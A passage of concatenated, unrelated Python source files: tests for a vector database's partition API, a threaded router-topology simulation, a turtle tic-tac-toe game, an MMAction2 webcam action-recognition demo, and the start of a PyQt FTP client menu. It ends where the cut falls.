        assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
    """
    ******************************************************************
      The following cases are used to test `has_partition` function
    ******************************************************************
    """
    # Parametrized fixture: each invalid string from gen_invalid_strs()
    # produces one test case.
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_has_partition_a(self, connect, collection):
        '''
        target: test has_partition, check status and result
        method: create partition first, then call function: has_partition
        expected: status ok, result true
        '''
        connect.create_partition(collection, default_tag)
        res = connect.has_partition(collection, default_tag)
        logging.getLogger().info(res)
        assert res

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_has_partition_multi_partitions(self, connect, collection):
        '''
        target: test has_partition, check status and result
        method: create partition first, then call function: has_partition
        expected: status ok, result true
        '''
        for tag_name in [default_tag, "tag_new", "tag_new_new"]:
            connect.create_partition(collection, tag_name)
        for tag_name in [default_tag, "tag_new", "tag_new_new"]:
            res = connect.has_partition(collection, tag_name)
            assert res

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_has_partition_name_not_existed(self, connect, collection):
        '''
        target: test has_partition, check status and result
        method: then call function: has_partition, with tag not existed
        expected: status ok, result empty
        '''
        res = connect.has_partition(collection, default_tag)
        logging.getLogger().info(res)
        assert not res

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_has_partition_collection_not_existed(self, connect, collection):
        '''
        target: test has_partition, check status and result
        method: then call function: has_partition, with collection not existed
        expected: status not ok
        '''
        collection_name = "not_existed_collection"
        try:
            # NOTE(review): if no exception is raised the assertions below
            # are skipped and the test passes silently.
            connect.has_partition(collection_name, default_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "HasPartition failed: can't find collection: %s" % collection_name

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
        '''
        target: test has partition, with invalid tag name, check status returned
        method: call function: has_partition
        expected: status ok
        '''
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        with pytest.raises(Exception) as e:
            connect.has_partition(collection, tag_name)
class TestDropBase:
    """
    ******************************************************************
      The following cases are used to test `drop_partition` function
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_partition_a(self, connect, collection):
        '''
        target: test drop partition, check status and partition if existed
        method: create partitions first, then call function: drop_partition
        expected: status ok, no partitions in db
        '''
        connect.create_partition(collection, default_tag)
        res1 = connect.list_partitions(collection)
        assert default_tag in res1
        connect.drop_partition(collection, default_tag)
        res2 = connect.list_partitions(collection)
        assert default_tag not in res2

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_partition_name_not_existed(self, connect, collection):
        '''
        target: test drop partition, but tag not existed
        method: create partitions first, then call function: drop_partition
        expected: status not ok
        '''
        connect.create_partition(collection, default_tag)
        new_tag = "new_tag"
        try:
            # NOTE(review): if no exception is raised the assertions below
            # are skipped and the test passes silently.
            connect.drop_partition(collection, new_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "DropPartition failed: partition %s does not exist" % new_tag

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_partition_name_not_existed_A(self, connect, collection):
        '''
        target: test drop partition, but collection not existed
        method: create partitions first, then call function: drop_partition
        expected: status not ok
        '''
        connect.create_partition(collection, default_tag)
        new_collection = gen_unique_str()
        try:
            connect.drop_partition(new_collection, default_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "DropPartition failed: can't find collection: %s" % new_collection

    @pytest.mark.tags(CaseLabel.L2)
    def test_drop_partition_repeatedly(self, connect, collection):
        '''
        target: test drop partition twice, check status and partition if existed
        method: create partitions first, then call function: drop_partition
        expected: status not ok, no partitions in db
        '''
        connect.create_partition(collection, default_tag)
        connect.drop_partition(collection, default_tag)
        time.sleep(2)  # allow the drop to propagate before retrying
        try:
            connect.drop_partition(collection, default_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "DropPartition failed: partition %s does not exist" % default_tag
        tag_list = connect.list_partitions(collection)
        assert default_tag not in tag_list

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_partition_create(self, connect, collection):
        '''
        target: test drop partition, and create again, check status
        method: create partitions first, then call function: drop_partition, create_partition
        expected: status not ok, partition in db
        '''
        connect.create_partition(collection, default_tag)
        assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
        connect.drop_partition(collection, default_tag)
        assert compare_list_elements(connect.list_partitions(collection), ['_default'])
        time.sleep(2)  # allow the drop to propagate before re-creating
        connect.create_partition(collection, default_tag)
        assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
    # Invalid-input tests: every invalid collection/tag string must make the
    # client or server raise.
    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
        '''
        target: test drop partition, with invalid collection name, check status returned
        method: call function: drop_partition
        expected: status not ok
        '''
        collection_name = get_collection_name
        connect.create_partition(collection, default_tag)
        with pytest.raises(Exception) as e:
            connect.drop_partition(collection_name, default_tag)

    @pytest.mark.tags(CaseLabel.L2)
    def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
        '''
        target: test drop partition, with invalid tag name, check status returned
        method: call function: drop_partition
        expected: status not ok
        '''
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        with pytest.raises(Exception) as e:
            connect.drop_partition(collection, tag_name)

    @pytest.mark.tags(CaseLabel.L2)
    def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
        '''
        target: test show partitions, with invalid collection name, check status returned
        method: call function: list_partitions
        expected: status not ok
        '''
        collection_name = get_collection_name
        connect.create_partition(collection, default_tag)
        with pytest.raises(Exception) as e:
            connect.list_partitions(collection_name)
class TestNewCase(object):
    # The built-in '_default' partition must never be droppable.

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_default_partition_A(self, connect, collection):
        '''
        target: test drop partition of default, check status returned
        method: call function: drop_partition
        expected: status not ok
        '''
        try:
            # NOTE(review): if no exception is raised the assertions inside
            # the except-block are skipped and the test passes silently.
            connect.drop_partition(collection, partition_name='_default')
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "DropPartition failed: default partition cannot be deleted"
        list_partition = connect.list_partitions(collection)
        assert '_default' in list_partition

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_drop_default_partition_B(self, connect, collection):
        '''
        target: test drop partition of default, check status returned
        method: call function: drop_partition
        expected: status not ok
        '''
        connect.create_partition(collection, default_tag)
        try:
            connect.drop_partition(collection, partition_name='_default')
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "DropPartition failed: default partition cannot be deleted"
        list_partition = connect.list_partitions(collection)
        assert '_default' in list_partition
|
network_protocol.py | import numpy as np
import enum
import time
from threading import Thread
import topology as topology_class
class MsgType(enum.Enum):
    """Kinds of messages exchanged between Router and DesignatedRouter."""
    NEIGHBORS = enum.auto()      # carries a node's neighbor list
    GET_TOPOLOGY = enum.auto()   # router asks the DR for the full topology
    SET_TOPOLOGY = enum.auto()   # delivers a Topology replacing the local copy
    OFF = enum.auto()            # announces a router going offline
    PRINT_WAYS = enum.auto()     # asks a router to print its shortest paths
class Message:
    """Plain envelope pairing a payload (`data`) with a `MsgType` tag (`type`)."""

    def __init__(self):
        # both fields are populated by the sender after construction
        self.type = None
        self.data = None

    def __str__(self):
        return f"({self.type}: {self.data})"
class Connection:
    """Bidirectional FIFO message pipe between two endpoints.

    Direction convention (matching send/get usage):
      * ``send_message(msg, 0)`` appends to ``left_queue``; the other side
        reads it with ``get_message(1)``.
      * ``send_message(msg, 1)`` appends to ``right_queue``; the other side
        reads it with ``get_message(0)``.
    """

    def __init__(self):
        self.right_queue = []
        self.left_queue = []

    def __str__(self):
        # BUG FIX: the right queue was previously printed for BOTH
        # directions; the left queue was never shown.
        return f"(->:{self.right_queue}\n<-:{self.left_queue})"

    @staticmethod
    def __get_message(queue):
        """Pop and return the oldest message, or None when the queue is empty."""
        if queue:
            return queue.pop(0)
        return None

    def get_message(self, direction=0):
        """Receive the next message addressed to this endpoint, if any."""
        if direction == 0:
            return self.__get_message(self.right_queue)
        return self.__get_message(self.left_queue)

    def send_message(self, message, direction=0):
        """Queue ``message`` for the opposite endpoint."""
        if direction == 0:
            self.left_queue.append(message)
        else:
            self.right_queue.append(message)
class Router:
    """Network node that mirrors the topology through its link to the
    designated router (DR)."""

    def __init__(self, conn, index):
        self.DR_connection = conn                       # Connection to the DR
        self.topology = topology_class.Topology()       # local topology copy
        self.shortest_roads = None
        self.index = index                              # this router's node id
        self.neighbors = []                             # directly linked node ids

    def print_shortest_ways(self):
        """Compute and print shortest paths from this node."""
        shortest_ways = self.topology.get_shortest_ways(self.index)
        print(f"{self.index}: {shortest_ways}\n", end="")

    def send_neighbors(self):
        """Announce this node's neighbor list to the DR."""
        msg = Message()
        msg.type = MsgType.NEIGHBORS
        msg.data = self.neighbors.copy()
        self.DR_connection.send_message(msg)

    def get_topology(self):
        """Request the full topology from the DR."""
        msg = Message()
        msg.type = MsgType.GET_TOPOLOGY
        self.DR_connection.send_message(msg)

    def router_start(self):
        """Join the network: publish neighbors, then ask for the topology."""
        self.send_neighbors()
        self.get_topology()

    def router_off(self):
        """Notify the DR that this router is going offline."""
        msg = Message()
        msg.type = MsgType.OFF
        self.DR_connection.send_message(msg)

    def add_node(self, index, neighbors):
        """Insert a node and its links into the local topology."""
        self.topology.add_new_node(index)
        for j in neighbors:
            self.topology.add_new_link(index, j)

    def delete_node(self, index):
        """Remove a node from the local topology."""
        self.topology.delete_node(index)

    def proc_message(self):
        """Handle at most one pending message from the DR, if any."""
        input_msg = self.DR_connection.get_message()
        if input_msg is None:
            return
        print(f"r({self.index}) : {input_msg}\n", end="")
        if input_msg.type == MsgType.NEIGHBORS:
            index = input_msg.data["index"]
            neighbors = input_msg.data["neighbors"]
            self.add_node(index, neighbors)
        elif input_msg.type == MsgType.SET_TOPOLOGY:
            # replace the local copy wholesale
            self.topology = input_msg.data
        elif input_msg.type == MsgType.OFF:
            self.delete_node(input_msg.data)
        elif input_msg.type == MsgType.PRINT_WAYS:
            self.print_shortest_ways()
        else:
            # BUG FIX: message previously read "unexpected msf type"
            print("DR: unexpected msg type:", input_msg.type)
class DesignatedRouter:
    """Central hub: collects neighbor announcements and rebroadcasts topology changes."""

    def __init__(self):
        self.connections = []                       # one Connection per attached router
        self.topology = topology_class.Topology()   # authoritative network view

    def add_connection(self):
        """Create a Connection for a new router; return (connection, router index)."""
        new_connection = Connection()
        new_index = len(self.connections)
        self.connections.append(new_connection)
        return new_connection, new_index

    def add_node(self, index, neighbors):
        """Add node *index* and its links to the authoritative topology."""
        self.topology.add_new_node(index)
        for j in neighbors:
            self.topology.add_new_link(index, j)

    def delete_node(self, index):
        """Remove node *index* from the authoritative topology."""
        self.topology.delete_node(index)

    def send_all_exclude_one(self, exclude_index, msg):
        """Broadcast *msg* to every connected router except *exclude_index*."""
        for conn_ind in range(len(self.connections)):
            conn = self.connections[conn_ind]
            if conn is None:
                continue
            if conn_ind == exclude_index:
                continue
            conn.send_message(msg, 1)

    def proc_msg_neighbors(self, conn_ind, input_msg):
        """Record a router's neighbor list and rebroadcast it to the others."""
        self.add_node(conn_ind, input_msg.data)
        msg = Message()
        msg.type = MsgType.NEIGHBORS
        msg.data = {"index": conn_ind,
                    "neighbors": input_msg.data
                    }
        self.send_all_exclude_one(conn_ind, msg)

    def proc_msg_off(self, conn_ind, input_msg):
        """Drop a router from the topology and notify the others."""
        self.delete_node(conn_ind)
        msg = Message()
        msg.type = MsgType.OFF
        msg.data = conn_ind
        self.send_all_exclude_one(conn_ind, msg)

    def print_shortest_ways(self):
        """Ask every connected router to print its shortest paths."""
        msg = Message()
        msg.type = MsgType.PRINT_WAYS
        for conn in self.connections:
            # Fix: guard against None slots, consistent with the other
            # connection loops in this class.
            if conn is None:
                continue
            conn.send_message(msg, 1)

    def proc_message(self):
        """Drain at most one pending message from each connection."""
        for conn_ind in range(len(self.connections)):
            conn = self.connections[conn_ind]
            if conn is None:
                continue
            input_msg = conn.get_message(1)
            if input_msg is None:
                continue
            print(f"dr({conn_ind}): {input_msg}\n", end="")
            if input_msg.type == MsgType.NEIGHBORS:
                self.proc_msg_neighbors(conn_ind, input_msg)
            elif input_msg.type == MsgType.GET_TOPOLOGY:
                msg = Message()
                msg.type = MsgType.SET_TOPOLOGY
                msg.data = self.topology.copy()
                conn.send_message(msg, 1)
            elif input_msg.type == MsgType.OFF:
                self.proc_msg_off(conn_ind, input_msg)
            else:
                # Fix: "msf" typo.
                print("DR: unexpected msg type:", input_msg.type)
# Shared state for the simulation threads below.
designed_router: DesignatedRouter = None  # created inside designed_router_run()
stop_flag = False  # raised to make every thread's loop exit
printer_flag = False  # raised once per second to trigger a paths printout
blink_conn_arr = []  # per-router flags requesting a simulated link flap
def router_run(neighbors):
    """Thread body for one router: register with the DR, then poll forever.

    NOTE(review): the loop busy-waits (no sleep between proc_message calls),
    which pins a CPU core per router thread.
    """
    global designed_router
    global blink_conn_arr
    conn, index = designed_router.add_connection()
    router = Router(conn, index)
    router.neighbors = neighbors.copy()
    router.router_start()
    while True:
        router.proc_message()
        if blink_conn_arr[router.index]:
            # simulate a link flap: announce offline, wait, rejoin
            router.router_off()
            time.sleep(2)
            router.router_start()
            blink_conn_arr[router.index] = False
        if stop_flag:
            break
def designed_router_run():
    """Thread body for the DR: create the global DesignatedRouter and poll.

    Router threads attach through the module-level ``designed_router``.
    """
    global designed_router
    global printer_flag
    designed_router = DesignatedRouter()
    while True:
        designed_router.proc_message()
        if printer_flag:
            # printer() raises this flag roughly once per second
            designed_router.print_shortest_ways()
            printer_flag = False
        if stop_flag:
            break
def stopper():
    """Raise the global stop flag after 10 seconds.

    NOTE(review): not started by simulate() in this file — verify it is
    used elsewhere before relying on it.
    """
    global stop_flag
    time.sleep(10)
    stop_flag = True
def printer():
    """Once per second, ask the DR thread to print shortest paths."""
    global printer_flag
    while True:
        time.sleep(1)
        printer_flag = True
        if stop_flag:
            break
def connections_breaker():
    """Randomly mark a router for a simulated link flap until stopped."""
    global blink_conn_arr
    time.sleep(2)  # let the network converge before breaking anything
    threshold = 0.5  # probability gate for triggering a flap
    while True:
        time.sleep(0.01)
        val = np.random.rand()
        if val >= threshold:
            index = np.random.randint(0, len(blink_conn_arr))
            blink_conn_arr[index] = True
            time.sleep(2)  # give the flapped router time to go down and rejoin
        if stop_flag:
            break
def simulate(nodes, neighbors):
    """Run the routing simulation for len(nodes) routers for ~5 seconds.

    nodes: sequence of node identifiers (only its length is used).
    neighbors: per-node neighbor lists, indexed like *nodes*.
    """
    global blink_conn_arr
    global stop_flag
    dr_thread = Thread(target=designed_router_run, args=())
    node_threads = [Thread(target=router_run, args=(neighbors[i],)) for i in range(len(nodes))]
    blink_conn_arr = [False for i in range(len(nodes))]
    dr_thread.start()
    # Fix: wait until the DR thread has published the global DesignatedRouter.
    # Starting router threads earlier let router_run dereference None.
    while designed_router is None:
        time.sleep(0.01)
    for i in range(len(nodes)):
        node_threads[i].start()
    printer_thread = Thread(target=printer, args=())
    conn_breaker_thread = Thread(target=connections_breaker, args=())
    conn_breaker_thread.start()
    printer_thread.start()
    time.sleep(5)
    stop_flag = True
    for i in range(len(nodes)):
        node_threads[i].join()
    dr_thread.join()
    # Fix: also join the helper threads so simulate() only returns after
    # every thread has observed stop_flag and exited.
    printer_thread.join()
    conn_breaker_thread.join()
|
tictactoe.py | """Tic Tac Toe
Exercises
1. Give the X and O a different color and width.
2. What happens when someone taps a taken spot?
3. How would you detect when someone has won?
4. How could you create a computer player?
"""
from turtle import *
from freegames import line
from threading import Thread
from playsound import playsound
import time
# Play the beep sound file (playsound blocks until playback ends)
def music_func():
    playsound('Beep.mp3')
# Background threads that play the audio; daemon so they don't block exit.
# NOTE(review): music2 is created but never started in this file.
music = Thread(target=music_func)
music.daemon = True
music2 = Thread(target=music_func)
music2.daemon = True
# Play the sound once at startup
music.start()
def grid():
    """Draw the tic-tac-toe board: two vertical then two horizontal lines."""
    for x in (-67, 67):
        line(x, 200, x, -200)
    for y in (-67, 67):
        line(-200, y, 200, y)
def drawx(x, y):
    """Draw the X player as two diagonal strokes in the square at (x, y)."""
    strokes = (
        (x, y, x + 133, y + 133),
        (x, y + 133, x + 133, y),
    )
    for x1, y1, x2, y2 in strokes:
        line(x1, y1, x2, y2)
def drawo(x, y):
    """Draw the O player as a circle inside the square at (x, y)."""
    up()                 # lift pen while repositioning
    goto(x + 67, y + 5)  # bottom-center of the square; circle() draws upward
    down()
    circle(62)
def floor(value):
"Round value down to grid with square size 133."
return ((value + 200) // 133) * 133 - 200
state = {'player': 0}  # whose turn it is: index into players (0 = X, 1 = O)
players = [drawx, drawo]  # draw function per player index
def tap(x, y):
    """Draw X or O in the tapped square, run a 1-second beeped countdown,
    then pass the turn to the other player.

    Bound to screen clicks; x/y are pixel coordinates snapped to the grid.
    NOTE(review): the countdown blocks the turtle event loop while it runs.
    """
    x = floor(x)
    y = floor(y)
    player = state['player']
    draw = players[player]
    draw(x, y)
    update()
    tiempo = 1  # countdown length in seconds
    while tiempo:
        m, s = divmod(tiempo, 60)
        min_sec_format = '{:02d}:{:02d}'.format(m, s)
        # Fix: '\r' (carriage return) keeps the countdown on one console
        # line; the original "/r" printed a literal slash-r every tick.
        print(min_sec_format, end='\r')
        time.sleep(1)
        tiempo -= 1
    music_func()
    state['player'] = not player
setup(420, 420, 370, 0)  # 420x420 window positioned at screen offset (370, 0)
hideturtle()
tracer(False)  # disable animation; drawing appears only on update()
grid()
update()
onscreenclick(tap)  # route clicks to the tap handler above
done()
|
webcam_demo.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import cv2
import numpy as np
import torch
from mmcv import Config, DictAction
from mmcv.parallel import collate, scatter
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
# OpenCV overlay text settings shared by the drawing loop.
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255)  # BGR, white
MSGCOLOR = (128, 128, 128)  # BGR, gray
THICKNESS = 1
LINETYPE = 1
# Pipeline steps that load/decode frames from files; stripped in main()
# because frames come from the live camera. (Name is a typo of "EXCLUDED".)
EXCLUED_STEPS = [
    'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
    'PyAVDecode', 'RawFrameDecode', 'FrameSelector'
]
def parse_args():
    """Parse and validate command-line arguments for the webcam demo."""
    parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
    parser.add_argument('config', help='test config file path')
    parser.add_argument('checkpoint', help='checkpoint file')
    parser.add_argument('label', help='label file')
    parser.add_argument(
        '--device', type=str, default='cuda:0', help='CPU/CUDA device option')
    parser.add_argument(
        '--camera-id', type=int, default=0, help='camera device id')
    parser.add_argument(
        '--threshold',
        type=float,
        default=0.01,
        help='recognition score threshold')
    parser.add_argument(
        '--average-size',
        type=int,
        default=1,
        help='number of latest clips to be averaged for prediction')
    parser.add_argument(
        '--drawing-fps',
        type=int,
        default=20,
        help='Set upper bound FPS value of the output drawing')
    parser.add_argument(
        '--inference-fps',
        type=int,
        default=4,
        help='Set upper bound FPS value of model inference')
    parser.add_argument(
        '--cfg-options',
        nargs='+',
        action=DictAction,
        default={},
        help='override some settings in the used config, the key-value pair '
        'in xxx=yyy format will be merged into config file. For example, '
        "'--cfg-options model.backbone.depth=18 model.backbone.with_cp=True'")
    args = parser.parse_args()
    # Fix: validate explicitly instead of `assert`, which is silently
    # stripped when Python runs with -O.
    if args.drawing_fps < 0 or args.inference_fps < 0:
        parser.error('upper bound FPS value of drawing and inference should '
                     'be set as positive number, or zero for no limit')
    return args
def show_results():
    """Drawing loop: read webcam frames, overlay latest recognition results.

    Runs in its own thread; communicates with inference() through the
    module-level frame_queue / result_queue deques.  Exits on Esc/q/Q.
    """
    print('Press "Esc", "q" or "Q" to exit')
    text_info = {}
    cur_time = time.time()
    while True:
        msg = 'Waiting for action ...'
        ret, frame = camera.read()
        # reverse channel order before queueing — presumably BGR -> RGB
        # for the model; the displayed frame stays BGR
        frame_queue.append(np.array(frame[:, :, ::-1]))
        if len(result_queue) != 0:
            text_info = {}
            results = result_queue.popleft()
            for i, result in enumerate(results):
                selected_label, score = result
                # results are sorted descending, so stop at the first
                # score below threshold
                if score < threshold:
                    break
                location = (0, 40 + i * 20)
                text = selected_label + ': ' + str(round(score, 2))
                text_info[location] = text
                cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
                            FONTCOLOR, THICKNESS, LINETYPE)
        elif len(text_info):
            # no fresh result: redraw the last known labels
            for location, text in text_info.items():
                cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
                            FONTCOLOR, THICKNESS, LINETYPE)
        else:
            cv2.putText(frame, msg, (0, 40), FONTFACE, FONTSCALE, MSGCOLOR,
                        THICKNESS, LINETYPE)
        cv2.imshow('camera', frame)
        ch = cv2.waitKey(1)
        if ch == 27 or ch == ord('q') or ch == ord('Q'):
            break
        if drawing_fps > 0:
            # add a limiter for actual drawing fps <= drawing_fps
            sleep_time = 1 / drawing_fps - (time.time() - cur_time)
            if sleep_time > 0:
                time.sleep(sleep_time)
            cur_time = time.time()
def inference():
    """Inference loop: run the model on sliding windows of webcam frames.

    Runs in its own thread; pulls frames from frame_queue, averages scores
    over the last `average_size` clips, and pushes sorted (label, score)
    results into result_queue for show_results() to draw.
    """
    score_cache = deque()
    scores_sum = 0
    cur_time = time.time()
    while True:
        cur_windows = []
        # NOTE(review): busy-wait until enough frames are buffered —
        # spins a core while the queue fills
        while len(cur_windows) == 0:
            if len(frame_queue) == sample_length:
                cur_windows = list(np.array(frame_queue))
                if data['img_shape'] is None:
                    data['img_shape'] = frame_queue.popleft().shape[:2]
        cur_data = data.copy()
        cur_data['imgs'] = cur_windows
        cur_data = test_pipeline(cur_data)
        cur_data = collate([cur_data], samples_per_gpu=1)
        if next(model.parameters()).is_cuda:
            # move the batch to the GPU the model lives on
            cur_data = scatter(cur_data, [device])[0]
        with torch.no_grad():
            scores = model(return_loss=False, **cur_data)[0]
        score_cache.append(scores)
        scores_sum += scores
        if len(score_cache) == average_size:
            # average over the last `average_size` clips, keep top-5 labels
            scores_avg = scores_sum / average_size
            num_selected_labels = min(len(label), 5)
            scores_tuples = tuple(zip(label, scores_avg))
            scores_sorted = sorted(
                scores_tuples, key=itemgetter(1), reverse=True)
            results = scores_sorted[:num_selected_labels]
            result_queue.append(results)
            scores_sum -= score_cache.popleft()
        if inference_fps > 0:
            # add a limiter for actual inference fps <= inference_fps
            sleep_time = 1 / inference_fps - (time.time() - cur_time)
            if sleep_time > 0:
                time.sleep(sleep_time)
            cur_time = time.time()
    camera.release()
    cv2.destroyAllWindows()
def main():
    """Entry point: load the recognizer, then run drawing and inference
    in two daemon threads until the drawing thread exits."""
    # threads communicate exclusively via these module-level globals
    global frame_queue, camera, frame, results, threshold, sample_length, \
        data, test_pipeline, model, device, average_size, label, \
        result_queue, drawing_fps, inference_fps
    args = parse_args()
    average_size = args.average_size
    threshold = args.threshold
    drawing_fps = args.drawing_fps
    inference_fps = args.inference_fps
    device = torch.device(args.device)
    cfg = Config.fromfile(args.config)
    cfg.merge_from_dict(args.cfg_options)
    model = init_recognizer(cfg, args.checkpoint, device=device)
    camera = cv2.VideoCapture(args.camera_id)
    data = dict(img_shape=None, modality='RGB', label=-1)
    with open(args.label, 'r') as f:
        label = [line.strip() for line in f]
    # prepare test pipeline from non-camera pipeline
    cfg = model.cfg
    sample_length = 0
    pipeline = cfg.data.test.pipeline
    pipeline_ = pipeline.copy()
    # iterate the original list while pruning the copy, so removal is safe
    for step in pipeline:
        if 'SampleFrames' in step['type']:
            sample_length = step['clip_len'] * step['num_clips']
            data['num_clips'] = step['num_clips']
            data['clip_len'] = step['clip_len']
            pipeline_.remove(step)
        if step['type'] in EXCLUED_STEPS:
            # remove step to decode frames
            pipeline_.remove(step)
    test_pipeline = Compose(pipeline_)
    assert sample_length > 0
    try:
        frame_queue = deque(maxlen=sample_length)
        result_queue = deque(maxlen=1)
        pw = Thread(target=show_results, args=(), daemon=True)
        pr = Thread(target=inference, args=(), daemon=True)
        pw.start()
        pr.start()
        # only the drawing thread is joined; inference dies with the process
        pw.join()
    except KeyboardInterrupt:
        pass
if __name__ == '__main__':
    main()
|
clientUI.py | from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5 import QtWidgets
from PyQt5.QtCore import *
from PyQt5 import QtGui
from pymediainfo import MediaInfo
from PyQt5.QtGui import QIcon
import cv2
from PyQt5.QtMultimedia import QMediaPlayer, QMediaPlaylist, QMediaContent
from PyQt5.QtCore import QDir, Qt, QUrl, pyqtSignal, QPoint, QRect, QObject
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer, QVideoFrame, QAbstractVideoSurface, QAbstractVideoBuffer, QVideoSurfaceFormat
import client
from PyQt5.QtWidgets import *
import scriptwrapper
import pickle
from threading import Thread
import settings
import os
# Module-level shared state; `games` is read by ClipDownloadMenu.populateGames
# and is presumably filled in by the client module — TODO confirm.
games = None
moreClips = None
selected_game = ''
current_path = os.path.dirname(os.path.realpath(__file__))  # directory containing this script
class LoginWindow(QMainWindow):
    """FTP login window: validates credentials and opens the main menu."""
    def __init__(self):
        QtWidgets.QWidget.__init__(self)
        uic.loadUi(f"{current_path}/UI/login.ui", self)
        try:
            self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
        except Exception as e:
            # icon is cosmetic; ignore if the asset is missing
            pass
        self.password.setEchoMode(QtWidgets.QLineEdit.Password)
        if settings.autoLogin:
            # pre-fill saved credentials from settings
            self.autoLogin.setChecked(True)
            self.username.setText(settings.FTP_USER)
            self.password.setText(settings.FTP_PASSWORD)
        self.login.clicked.connect(self.attemptLogin)
    def attemptLogin(self):
        """Try the entered credentials against the FTP server."""
        username = self.username.text()
        password = self.password.text()
        success = client.testFTPConnection(username, password)
        if success:
            self.loginSuccess()
        else:
            self.loginMessage.setText("Incorrect username or password")
    def loginSuccess(self):
        """Swap this window for the main menu and register it with client."""
        self.menu = MainMenu()
        self.menu.show()
        client.mainMenuWindow = self.menu
        self.close()
class MainMenu(QMainWindow):
    """Main menu: lists finished videos and launches downloading/editing.

    The pyqtSignals below let worker threads (started in client.*) push UI
    updates back onto the Qt main thread.
    """
    update_progress_bar = pyqtSignal(int)       # download progress value
    finish_downloading = pyqtSignal()           # download finished
    download_finished_videos_names = pyqtSignal(list)  # names for the combo box
    update_render_progress = pyqtSignal(dict)   # render progress/message payload
    def __init__(self):
        QtWidgets.QWidget.__init__(self)
        uic.loadUi(f"{current_path}/UI/menu.ui", self)
        try:
            self.setWindowIcon(QIcon('Assets/tiktoklogo.png'))
        except Exception as e:
            # icon is cosmetic; ignore if the asset is missing
            pass
        self.welcomeMessage.setText("Welcome %s!" % settings.FTP_USER)
        self.editVideo.clicked.connect(self.startEditingVideo)
        self.openVideos.clicked.connect(self.openDownloadLocation)
        self.refreshFinishedVideos.clicked.connect(self.getFinishedVideos)
        self.downloadSingle.clicked.connect(self.downloadFinishedVideo)
        self.getFinishedVideos()
        self.progressBar.setMaximum(2)
        self.update_progress_bar.connect(self.updateDownload)
        self.finish_downloading.connect(self.finishDownloading)
        self.update_render_progress.connect(self.updateRenderProgress)
        self.download_finished_videos_names.connect(self.populateFinishedVideos)
    def updateRenderProgress(self, dictionary):
        """Update render progress bar/message from a worker-thread payload."""
        max_progress = dictionary["max_progress"]
        current_progress = dictionary["current_progress"]
        render_message = dictionary["render_message"]
        if max_progress is not None:
            self.renderProgress.setMaximum(max_progress)
        if current_progress is not None:
            self.renderProgress.setValue(current_progress)
        self.renderMessage.setText(render_message)
    def downloadFinishedVideo(self):
        """Download the selected finished video on a background thread."""
        self.downloadSingle.setEnabled(False)
        self.progressBar.setValue(0)
        name = self.finishedVidSelect.currentText()
        Thread(target=client.downloadFinishedVideo, args=(name, self)).start()
    def populateFinishedVideos(self, names):
        """Fill the combo box with finished-video names (newest first)."""
        self.finishedVidSelect.clear()
        names.reverse()
        self.finishedVidSelect.addItems(names)
        self.downloadSingle.setEnabled(True)
        self.completedVideos.setText("%s Completed Videos" % len(names))
    def getFinishedVideos(self):
        """Refresh the finished-video list on a background thread."""
        self.downloadSingle.setEnabled(False)
        Thread(target=client.requestFinishedVideoList, args=(self,)).start()
    def startEditingVideo(self):
        """Open the clip-download window and hide the menu."""
        self.download_menu = ClipDownloadMenu()
        self.download_menu.show()
        client.mainMenuWindow = self
        self.close()
    def updateDownload(self, number):
        self.progressBar.setValue(number)
    def finishDownloading(self):
        self.downloadSingle.setEnabled(True)
        self.openDownloadLocation()
    def openDownloadLocation(self):
        # os.startfile is Windows-only
